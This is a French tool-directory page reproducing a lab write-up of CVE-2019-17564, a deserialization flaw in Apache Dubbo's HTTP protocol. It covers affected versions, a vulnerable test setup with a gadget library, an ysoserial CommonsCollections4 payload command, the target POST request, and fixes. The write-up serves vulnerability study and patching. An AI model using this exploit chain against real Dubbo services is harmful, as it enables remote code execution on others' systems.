Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/fairyming/cve-2019-17564
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubfairyming/cve-2019-17564

CVE-2019-17564

CVE-2019-17564:Vulnérabilité de désérialisation Apache Dubbo

Voir le dépôt
851il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-17564 : Vulnérabilité de désérialisation dans Apache Dubbo

0x00 Introduction

Apache Dubbo est un framework RPC Java open source hautes performances et léger. Il offre trois capacités principales : l'appel de méthode à distance orienté interface, la tolérance aux pannes intelligente et l'équilibrage de charge, ainsi que l'enregistrement et la découverte automatiques des services.

0x01 Présentation de la vulnérabilité

Apache Dubbo prend en charge plusieurs protocoles, le protocole Dubbo étant recommandé officiellement. Une vulnérabilité de désérialisation (CVE-2019-17564) existe dans le protocole HTTP d'Apache Dubbo. La cause principale est qu'une fois le protocole HTTP activé, Apache Dubbo traite incorrectement le corps du message, entraînant une désérialisation non sécurisée. Lorsque des gadgets exploitables sont présents dans le projet, cela peut conduire à une exécution de code à distance.

0x02 Versions affectées

2.7.0 <= Apache Dubbo <= 2.7.4.1 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x

0x03 Mise en place de l'environnement

  1. Comme le démarrage de Dubbo dépend de Zookeeper, installez d'abord Zookeeper.
root@kitploit:~
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# Renommez zoo_sample.cfg en zoo.cfg dans le répertoire conf
mv zoo_sample.cfg zoo.cfg
# Entrez dans le répertoire bin et démarrez Zookeeper
./zkServer.sh start

WX20200222-171524@2x.png

  1. Récupérez le projet Dubbo depuis GitHub et modifiez pom.xml.
root@kitploit:~
git clone https://github.com/apache/dubbo-samples
# Allez dans le répertoire dubbo-samples-http et modifiez pom.xml
vim pom.xml

Modifiez la version de Dubbo vers une version vulnérable. WX20200222-172028@2x.png Ajoutez une dépendance pour importer un gadget déclenchable. Ici, nous importons commons-collections4-4.0.

root@kitploit:~
<dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>

WX20200222-172346@2x.png

  1. Construisez avec Maven et démarrez Dubbo.
root@kitploit:~
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

WX20200222-172721@2x.png

0x04 Exploitation de la vulnérabilité

Payload

root@kitploit:~
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

paylaod

Ici, nous utilisons ysoserial pour générer le payload.

root@kitploit:~
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser

Envoi via Burp Suite. WX20200222-173202@2x.png

0x05 Correction

  1. Désactivez le protocole HTTP.
  2. Mettez à jour immédiatement vers la version 2.7.5 ou ultérieure. Lien associé : https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5

Références :

https://www.mail-archive.com/[email protected]/msg06225.html

Télécharger l’outil